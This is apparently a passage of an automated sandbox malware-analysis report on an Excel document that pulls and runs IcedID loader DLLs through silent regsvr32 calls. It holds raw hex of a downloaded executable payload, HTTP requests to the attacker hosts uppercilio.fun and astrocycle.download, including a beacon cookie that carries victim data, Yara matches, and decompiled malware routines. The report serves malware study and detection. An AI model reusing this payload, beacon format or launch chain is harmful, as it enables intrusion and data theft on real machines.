4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
Jul 6, 2021 16:11:22.584901094 CEST	5	IN	Data Raw: 00 00 02 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @@
Jul 6, 2021 16:11:22.584939957 CEST	6	IN	Data Raw: 6b dc 00 00 c7 84 24 a4 00 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 Data Ascii: k$#ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@H
Jul 6, 2021 16:11:22.584975958 CEST	8	IN	Data Raw: 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f Data Ascii: H$HIH$$$H$HI HL$p$$H\|$p$$HL$pHIPHL$h$$HL$pfQHf$$$\|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lL
Jul 6, 2021 16:11:22.585015059 CEST	9	IN	Data Raw: b2 00 00 00 89 84 24 f8 00 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 Data Ascii: $D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4
Jul 6, 2021 16:11:22.585055113 CEST	10	IN	Data Raw: 74 24 70 48 8b b4 24 a0 00 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 Data Ascii: t$pH$H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$
Jul 6, 2021 16:11:22.585102081 CEST	12	IN	Data Raw: 24 a0 00 00 00 4c 8b 84 24 a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 Data Ascii: $L$AH(ALHT$PHT$PH$H$$H\|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHL
Jul 6, 2021 16:11:22.585144997 CEST	13	IN	Data Raw: 24 60 89 84 24 44 01 00 00 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 Data Ascii: $`$DHL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$\|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`
Jul 6, 2021 16:11:22.585184097 CEST	15	IN	Data Raw: 8b 44 24 50 48 89 84 24 70 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 Data Ascii: D$PH$pH$p$\|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$
Jul 6, 2021 16:11:22.585237980 CEST	16	IN	Data Raw: 89 c2 44 8b 04 91 44 89 c1 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 Data Ascii: DDHHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$\|HL$PD$+
Jul 6, 2021 16:11:22.585828066 CEST	18	IN	Data Raw: 48 89 8c 24 a0 00 00 00 48 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 Data Ascii: H$H$$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49169	104.21.55.83	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 16:11:22.740634918 CEST	65	OUT	GET /div/44376,8555986111.jpg HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: uppercilio.fun Connection: Keep-Alive
Jul 6, 2021 16:11:22.794564009 CEST	66	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 14:11:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 890 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=g27So0x4QXN9hzW8ekUQ6lmWUd5fWS4LDAmTBRGtwWPoyHAln6SFKJD7KoHmwajln1oOq1ORXqsl0qwwndKK8oE1cto1j5hBlQqdm7KPE30KFjjz4mmxr2szSlI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 66a96c035c4c2c2a-FRA Content-Encoding: gzip alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: 14
Jul 6, 2021 16:11:22.794603109 CEST	66	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49171	172.67.213.115	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 16:11:25.558825970 CEST	324	OUT	GET / HTTP/1.1 Connection: Keep-Alive Cookie: __gads=3565085024:1:6826:48; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=333737313432:416C627573:37443741304539443043413546423346; __io=0; _gid=67AFEDC5AC03 Host: astrocycle.download
Jul 6, 2021 16:11:26.105088949 CEST	325	IN	HTTP/1.1 404 Not Found Date: Tue, 06 Jul 2021 14:11:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=KHvsB4UastSDyZ00PSPKxxS257tJApreatajf3XyPgQVVR8oT0ZDPuDi4tk1YZCR5yP3ASMe48hf4p4KhxKzBpbPn%2F8L%2Bv47%2FRskLTe8o2DAZTOP9mECsTR7xqcpkWW9bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 66a96c14ec014a61-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
Jul 6, 2021 16:11:26.105140924 CEST	325	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jul 6, 2021 16:11:24.044653893 CEST	143.204.91.74	443	192.168.2.22	49170	CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US	Wed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009	Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
					CN=Amazon, OU=Server CA 1B, O=Amazon, C=US	CN=Amazon Root CA 1, O=Amazon, C=US	Thu Oct 22 02:00:00 CEST 2015	Sun Oct 19 02:00:00 CEST 2025
					CN=Amazon Root CA 1, O=Amazon, C=US	CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	Mon May 25 14:00:00 CEST 2015	Thu Dec 31 02:00:00 CET 2037
					CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US	Wed Sep 02 02:00:00 CEST 2009	Wed Jun 28 19:39:16 CEST 2034

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2576 Parent PID: 584

General

Start time:	16:11:35
Start date:	06/07/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f9b0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2824 Parent PID: 2576

General

Start time:	16:11:37
Start date:	06/07/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\XRAY.dll
Imagebase:	0xff160000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2836 Parent PID: 2576

General

Start time:	16:11:37
Start date:	06/07/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\XTOWN.dll
Imagebase:	0xff160000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp, Author: Joe Security Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2086927834.0000000000190000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2992 Parent PID: 2576

General

Start time:	16:11:40
Start date:	06/07/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\XZIBIT.dll
Imagebase:	0xff160000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 2836 Parent PID: 2576 regsvr32.exeCOMMON

Executed Functions

Function 021027BC, Relevance: 3.1, APIs: 2, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E021027BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E02102990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x21070c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E02102990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}

0x021027bc
0x021027bc
0x021027bc
0x021027bf
0x021027c3
0x021027c7
0x021027cb
0x021027d4
0x021027d7
0x021027e7
0x021027ea
0x021027fa
0x02102800
0x02102806
0x0210285f
0x0210285f
0x02102876
0x0210287b
0x02102893
0x02102893
0x0210280f
0x02102814
0x0210281f
0x0210282c
0x0210282c
0x0210282f
0x02102835
0x0210283b
0x00000000
0x00000000
0x02102842
0x02102845
0x02102849
0x02102894
0x02102897
0x0210289e
0x021028a9
0x021028b5
0x021028b7
0x021028ba
0x021028c1
0x021028c8
0x021028cd
0x021028d0
0x021028d0
0x021028b5
0x021028d7
0x021028da
0x021028df
0x021028e8
0x021028ed
0x021028f6
0x00000000
0x00000000
0x00000000
0x021028fc
0x0210284b
0x02102854
0x02102859
0x02102859

APIs

GetAdaptersInfo.IPHLPAPI(?,?,00000000,02102CFE,?,?,00000003,021024A4), ref: 0210280F
GetAdaptersInfo.IPHLPAPI(?,?,00000000,02102CFE,?,?,00000003,021024A4), ref: 02102845

Memory Dump Source

Source File: 00000004.00000002.2087554555.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: true

Similarity

API ID: AdaptersInfo
String ID:
API String ID: 3177971545-0
Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
Instruction ID: cc2b67b56876cd4a69e26d60305030e0ec4708d8998a455ad43d8d9f9a97bc42
Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
Instruction Fuzzy Hash: 44318D35601B8095EB15DB61E8C8BD9B7A0EB59F94F488126CF0D07798EFB8C18AC344

Uniqueness

Uniqueness Score: -1.00%

Function 02101810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL ref: 02101A08

Memory Dump Source

Source File: 00000004.00000002.2087554555.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
Instruction ID: b260b0c2f0310425b826c7c714994f5f0bf4501aa1a935c218d076cd8b02f64b
Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
Instruction Fuzzy Hash: 3F71AE32300B81D7EB24CF66E884BA937A1FB98B98F448125DF4A53B54DFB8C595C710

Uniqueness

Uniqueness Score: -1.00%

Function 021022DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

LookupAccountNameW.ADVAPI32 ref: 0210233C

Memory Dump Source

Source File: 00000004.00000002.2087554555.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: true

Similarity

API ID: AccountLookupName
String ID:
API String ID: 1484870144-0
Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
Instruction ID: ce399bbaa95a7bece3a29e21da2c8a7797bf80f49c1f81f5cee7d06e4077d6e9
Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
Instruction Fuzzy Hash: 9A316D72741B458AEB149FB5E8C87DA33A4EB48B88F584136DE4D97B58EF78C149C340

Uniqueness

Uniqueness Score: -1.00%

Function 02101678, Relevance: 1.6, APIs: 1, Instructions: 77nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,00000000,02102CB1,?,?,00000003,021024A4), ref: 021016CB

Memory Dump Source

Source File: 00000004.00000002.2087554555.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: true

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
Instruction ID: ab75a0fdd974ffee92715261b6b5238ffe010d16b27c2f7876419c72f7ec9c25
Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
Instruction Fuzzy Hash: 8321A135355B4093EB159F92A8C87A562A1BB99BC0F098034EE0E53798EFBCD4858700

Uniqueness

Uniqueness Score: -1.00%

Function 02102434, Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E02102434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E021011FC(_t73 - 0x29, _t52);
					_t37 = E0210153C(_t73 - 0x29);
					E02102C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E02101EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E0210272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E02101FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E02102A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}

0x02102434
0x02102434
0x02102434
0x02102434
0x02102434
0x02102434
0x02102434
0x02102439
0x0210243f
0x0210244d
0x0210244d
0x0210244d
0x02102512
0x02102528
0x02102450
0x02102454
0x02102456
0x0210245a
0x02102460
0x02102468
0x0210246e
0x02102472
0x00000000
0x02102474
0x02102482
0x0210248c
0x0210249d
0x0210249f
0x021024a4
0x021024a7
0x021024b0
0x021024bf
0x021024c1
0x021024cc
0x021024d2
0x021024d7
0x021024db
0x021024e0
0x021024e2
0x021024f0
0x021024f0
0x021024fc
0x02102501
0x02102504
0x0210250d
0x0210250d
0x02102504
0x021024cc
0x021024bf
0x00000000
0x021024a7

APIs

SleepEx.KERNEL32 ref: 02102468

Memory Dump Source

Source File: 00000004.00000002.2087554555.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: true

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
Instruction ID: 0fc11c559578abcbfdf890ee729709517fa966d57d766bce9e2dc1f0f1eb15e4
Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
Instruction Fuzzy Hash: DC21AF32340A409AEB10DFB1E8D87DD23A2F758788F584426DE4D9769CEF78D549C750

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB1370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000007FEF8FB13FA

Strings

G, xrefs: 000007FEF8FB141B
7, xrefs: 000007FEF8FB14E1
EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl, xrefs: 000007FEF8FB13FD
G, xrefs: 000007FEF8FB1426
G, xrefs: 000007FEF8FB1458
G, xrefs: 000007FEF8FB1448
2, xrefs: 000007FEF8FB14F9
G, xrefs: 000007FEF8FB1431
G, xrefs: 000007FEF8FB15AF
G, xrefs: 000007FEF8FB137C

Memory Dump Source

Source File: 00000004.00000002.2091049355.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2091045131.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2091053781.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2091060199.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2091064010.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
